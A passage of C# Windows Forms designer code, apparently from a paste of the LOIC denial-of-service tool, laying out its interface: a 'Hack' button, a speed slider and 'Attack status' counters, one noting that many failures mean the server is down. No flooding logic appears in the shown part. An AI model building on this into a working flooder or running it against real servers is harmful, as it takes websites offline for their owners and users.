  716. this.tbSpeed.ValueChanged += new System.EventHandler(this.tbSpeed_ValueChanged);
  717. //
  718. // label10
  719. //
  720. this.label10.Location = new System.Drawing.Point(683, 9);
  721. this.label10.Name = "label10";
  722. this.label10.Size = new System.Drawing.Size(23, 23);
  723. this.label10.TabIndex = 9;
  724. //
  725. // groupBox4
  726. //
  727. this.groupBox4.Controls.Add(this.cmdAttack);
  728. this.groupBox4.ForeColor = System.Drawing.Color.LightBlue;
  729. this.groupBox4.Location = new System.Drawing.Point(712, 12);
  730. this.groupBox4.Name = "groupBox4";
  731. this.groupBox4.Size = new System.Drawing.Size(258, 75);
  732. this.groupBox4.TabIndex = 2;
  733. this.groupBox4.TabStop = false;
  734. this.groupBox4.Text = "2. Ready?";
  735. //
  736. // cmdAttack
  737. //
  738. this.cmdAttack.BackColor = System.Drawing.Color.Black;
  739. this.cmdAttack.Font = new System.Drawing.Font("Impact", 15.75F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
  740. this.cmdAttack.ForeColor = System.Drawing.Color.Red;
  741. this.cmdAttack.Location = new System.Drawing.Point(6, 19);
  742. this.cmdAttack.Name = "cmdAttack";
  743. this.cmdAttack.Size = new System.Drawing.Size(246, 50);
  744. this.cmdAttack.TabIndex = 1;
  745. this.cmdAttack.Text = "Hack";
  746. this.TTip.SetToolTip(this.cmdAttack, "I sincerely hope you can guess what this button does.");
  747. this.cmdAttack.UseVisualStyleBackColor = false;
  748. this.cmdAttack.Click += new System.EventHandler(this.cmdAttack_Click);
  749. //
  750. // label11
  751. //
  752. this.label11.Location = new System.Drawing.Point(212, 380);
  753. this.label11.Name = "label11";
  754. this.label11.Size = new System.Drawing.Size(23, 23);
  755. this.label11.TabIndex = 10;
  756. //
  757. // groupBox5
  758. //
  759. this.groupBox5.BackColor = System.Drawing.Color.Tomato;
  760. this.groupBox5.Controls.Add(this.label19);
  761. this.groupBox5.Controls.Add(this.lbFailed);
  762. this.groupBox5.Controls.Add(this.lbRequested);
  763. this.groupBox5.Controls.Add(this.label22);
  764. this.groupBox5.Controls.Add(this.label23);
  765. this.groupBox5.Controls.Add(this.lbDownloaded);
  766. this.groupBox5.Controls.Add(this.lbDownloading);
  767. this.groupBox5.Controls.Add(this.lbRequesting);
  768. this.groupBox5.Controls.Add(this.lbConnecting);
  769. this.groupBox5.Controls.Add(this.lbIdle);
  770. this.groupBox5.Controls.Add(this.label12);
  771. this.groupBox5.Controls.Add(this.label13);
  772. this.groupBox5.Controls.Add(this.label14);
  773. this.groupBox5.Controls.Add(this.label15);
  774. this.groupBox5.Controls.Add(this.label16);
  775. this.groupBox5.ForeColor = System.Drawing.Color.LightBlue;
  776. this.groupBox5.Location = new System.Drawing.Point(212, 406);
  777. this.groupBox5.Name = "groupBox5";
  778. this.groupBox5.Size = new System.Drawing.Size(758, 68);
  779. this.groupBox5.TabIndex = 5;
  780. this.groupBox5.TabStop = false;
  781. this.groupBox5.Text = "Attack status";
  782. //
  783. // label19
  784. //
  785. this.label19.BackColor = System.Drawing.Color.Azure;
  786. this.label19.Location = new System.Drawing.Point(6, 40);
  787. this.label19.Name = "label19";
  788. this.label19.Size = new System.Drawing.Size(746, 1);
  789. this.label19.TabIndex = 25;
  790. this.label19.Text = "Idle";
  791. this.label19.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  792. //
  793. // lbFailed
  794. //
  795. this.lbFailed.Location = new System.Drawing.Point(648, 41);
  796. this.lbFailed.Name = "lbFailed";
  797. this.lbFailed.Size = new System.Drawing.Size(101, 24);
  798. this.lbFailed.TabIndex = 24;
  799. this.lbFailed.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  800. this.TTip.SetToolTip(this.lbFailed, "How many times (in total) the webserver didn\'t respond. High number = server down" +
  801. ".");
  802. //
  803. // lbRequested
  804. //
  805. this.lbRequested.Location = new System.Drawing.Point(541, 41);
  806. this.lbRequested.Name = "lbRequested";
  807. this.lbRequested.Size = new System.Drawing.Size(101, 24);
  808. this.lbRequested.TabIndex = 23;
  809. this.lbRequested.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  810. this.TTip.SetToolTip(this.lbRequested, "How many times (in total) a download has been requested");
  811. //
  812. // label22
  813. //
  814. this.label22.Location = new System.Drawing.Point(648, 16);
  815. this.label22.Name = "label22";
  816. this.label22.Size = new System.Drawing.Size(101, 24);
  817. this.label22.TabIndex = 22;
  818. this.label22.Text = "Failed";
  819. this.label22.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  820. //
  821. // label23
  822. //
  823. this.label23.Location = new System.Drawing.Point(541, 16);
  824. this.label23.Name = "label23";
  825. this.label23.Size = new System.Drawing.Size(101, 24);
  826. this.label23.TabIndex = 21;
  827. this.label23.Text = "Requested";
  828. this.label23.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  829. //
  830. // lbDownloaded
  831. //
  832. this.lbDownloaded.Location = new System.Drawing.Point(434, 41);
  833. this.lbDownloaded.Name = "lbDownloaded";
  834. this.lbDownloaded.Size = new System.Drawing.Size(101, 24);
  835. this.lbDownloaded.TabIndex = 20;
  836. this.lbDownloaded.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  837. this.TTip.SetToolTip(this.lbDownloaded, "How many times (in total) that a download has been initiated");
  838. //
  839. // lbDownloading
  840. //
  841. this.lbDownloading.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(12)))), ((int)(((byte)(24)))), ((int)(((byte)(32)))));
  842. this.lbDownloading.Location = new System.Drawing.Point(327, 41);
  843. this.lbDownloading.Name = "lbDownloading";
  844. this.lbDownloading.Size = new System.Drawing.Size(101, 24);
  845. this.lbDownloading.TabIndex = 19;
  846. this.lbDownloading.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  847. this.TTip.SetToolTip(this.lbDownloading, "How many threads that are downloading information from the server");
  848. //
  849. // lbRequesting
  850. //
  851. this.lbRequesting.Location = new System.Drawing.Point(220, 41);
  852. this.lbRequesting.Name = "lbRequesting";
  853. this.lbRequesting.Size = new System.Drawing.Size(101, 24);
  854. this.lbRequesting.TabIndex = 18;
  855. this.lbRequesting.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  856. this.TTip.SetToolTip(this.lbRequesting, "How many threads that are requesting information from the server");
  857. //
  858. // lbConnecting
  859. //
  860. this.lbConnecting.Location = new System.Drawing.Point(113, 41);
  861. this.lbConnecting.Name = "lbConnecting";
  862. this.lbConnecting.Size = new System.Drawing.Size(101, 24);
  863. this.lbConnecting.TabIndex = 17;
  864. this.lbConnecting.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  865. this.TTip.SetToolTip(this.lbConnecting, "How many threads that are trying to connect");
  866. //
  867. // lbIdle
  868. //
  869. this.lbIdle.Location = new System.Drawing.Point(6, 41);
  870. this.lbIdle.Name = "lbIdle";
  871. this.lbIdle.Size = new System.Drawing.Size(101, 24);
  872. this.lbIdle.TabIndex = 16;
  873. this.lbIdle.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  874. this.TTip.SetToolTip(this.lbIdle, "How many threads that are without work. Should be 0");
  875. //
  876. // label12
  877. //
  878. this.label12.Location = new System.Drawing.Point(434, 16);
  879. this.label12.Name = "label12";
  880. this.label12.Size = new System.Drawing.Size(101, 24);
  881. this.label12.TabIndex = 15;
  882. this.label12.Text = "Downloaded";
  883. this.label12.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  884. //
  885. // label13
  886. //
  887. this.label13.Location = new System.Drawing.Point(327, 16);
  888. this.label13.Name = "label13";
  889. this.label13.Size = new System.Drawing.Size(101, 24);
  890. this.label13.TabIndex = 14;
  891. this.label13.Text = "Downloading";
  892. this.label13.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  893. //
  894. // label14
  895. //
  896. this.label14.Location = new System.Drawing.Point(220, 16);
  897. this.label14.Name = "label14";
  898. this.label14.Size = new System.Drawing.Size(101, 24);
  899. this.label14.TabIndex = 13;
  900. this.label14.Text = "Requesting";
  901. this.label14.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  902. //
  903. // label15
  904. //
  905. this.label15.Location = new System.Drawing.Point(113, 16);
  906. this.label15.Name = "label15";
  907. this.label15.Size = new System.Drawing.Size(101, 24);
  908. this.label15.TabIndex = 12;
  909. this.label15.Text = "Connecting";
  910. this.label15.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  911. //
  912. // label16
  913. //
  914. this.label16.Location = new System.Drawing.Point(6, 16);
  915. this.label16.Name = "label16";
  916. this.label16.Size = new System.Drawing.Size(101, 24);
  917. this.label16.TabIndex = 11;
  918. this.label16.Text = "Idle";
  919. this.label16.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  920. //
  921. // tShowStats
  922. //
  923. this.tShowStats.Interval = 10;
  924. this.tShowStats.Tick += new System.EventHandler(this.tShowStats_Tick);
  925. //
  926. // pBanner
  927. //
  928. // this.pBanner.Image = Properties.Resources.LOIC;
  929. this.pBanner.Location = new System.Drawing.Point(12, 12);
  930. this.pBanner.Name = "pBanner";
  931. this.pBanner.Size = new System.Drawing.Size(184, 462);
  932. this.pBanner.TabIndex = 12;
  933. this.pBanner.TabStop = false;
  934. //
  935. // cBrowser
  936. //
  937. this.cBrowser.IsWebBrowserContextMenuEnabled = false;
  938. this.cBrowser.Location = new System.Drawing.Point(12, 12);
  939. this.cBrowser.MinimumSize = new System.Drawing.Size(20, 20);
  940. this.cBrowser.Name = "cBrowser";
  941. this.cBrowser.ScriptErrorsSuppressed = true;
  942. this.cBrowser.ScrollBarsEnabled = false;
  943. this.cBrowser.Size = new System.Drawing.Size(178, 459);
  944. this.cBrowser.TabIndex = 13;
  945. this.cBrowser.Visible = false;
  946. this.cBrowser.WebBrowserShortcutsEnabled = false;
  947. this.cBrowser.DocumentCompleted += new System.Windows.Forms.WebBrowserDocumentCompletedEventHandler(this.cBrowser_DocumentCompleted);
  948. //
  949. // frmMain
  950. //
  951. this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 14F);
  952. this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
  953. this.BackColor = System.Drawing.Color.Blue;
  954. this.ClientSize = new System.Drawing.Size(982, 486);
  955. this.Controls.Add(this.cBrowser);
  956. this.Controls.Add(this.pBanner);
  957. this.Controls.Add(this.groupBox3);
  958. this.Controls.Add(this.groupBox5);
  959. this.Controls.Add(this.label11);
  960. this.Controls.Add(this.groupBox4);
  961. this.Controls.Add(this.label10);
  962. this.Controls.Add(this.label3);
  963. this.Controls.Add(this.label5);
  964. this.Controls.Add(this.groupBox2);
  965. this.Controls.Add(this.groupBox1);
  966. this.Font = new System.Drawing.Font("Arial", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
  967. this.ForeColor = System.Drawing.Color.LightBlue;
  968. this.MaximizeBox = false;
  969. this.Name = "frmMain";
  970. this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
  971. this.Text = "Federal Tool | Hacking";
  972. this.Load += new System.EventHandler(this.frmMain_Load);
  973. this.groupBox1.ResumeLayout(false);
  974. this.groupBox1.PerformLayout();
  975. this.groupBox2.ResumeLayout(false);
  976. this.groupBox2.PerformLayout();
  977. this.groupBox3.ResumeLayout(false);
  978. this.groupBox3.PerformLayout();
  979. ((System.ComponentModel.ISupportInitialize)(this.tbSpeed)).EndInit();
  980. this.groupBox4.ResumeLayout(false);
  981. this.groupBox5.ResumeLayout(false);
  982. ((System.ComponentModel.ISupportInitialize)(this.pBanner)).EndInit();
  983. this.ResumeLayout(false);
  984.  
  985. }
  986. }
  987.  
  988. internal class Properties
  989. {
  990. internal static object Resources;
  991. }
  992. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement